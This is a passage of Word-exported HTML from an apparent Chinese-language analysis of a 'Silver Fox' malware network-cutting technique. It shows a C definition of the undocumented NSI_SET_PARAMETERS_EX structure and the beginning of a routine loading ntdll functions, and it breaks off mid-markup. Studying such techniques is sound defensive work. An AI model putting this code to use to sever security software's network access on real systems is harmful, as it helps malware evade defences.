Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PVOID Reserved0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">          </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x00</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PVOID Reserved1</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">          </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x08</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PVOID ModuleId</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">           </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x10</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD IoCode</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">             </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x18</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD Unused1</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x1C</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD Param1</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">             </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x20</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD Param2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">             </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x24</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PVOID InputBuffer</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x28</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD InputBufferSize</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x30</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD Unused2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x34</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PVOID MetricBuffer</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">       </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x38</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD MetricBufferSize</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">   </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x40</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD Unused3</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x44</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> NSI_SET_PARAMETERS_EX</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">bool</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> LoadNtFunctions</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">()</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">HMODULE ntdll </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> GetModuleHandleW</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;ntdll.dll&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(!</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">ntdll</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">false</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: 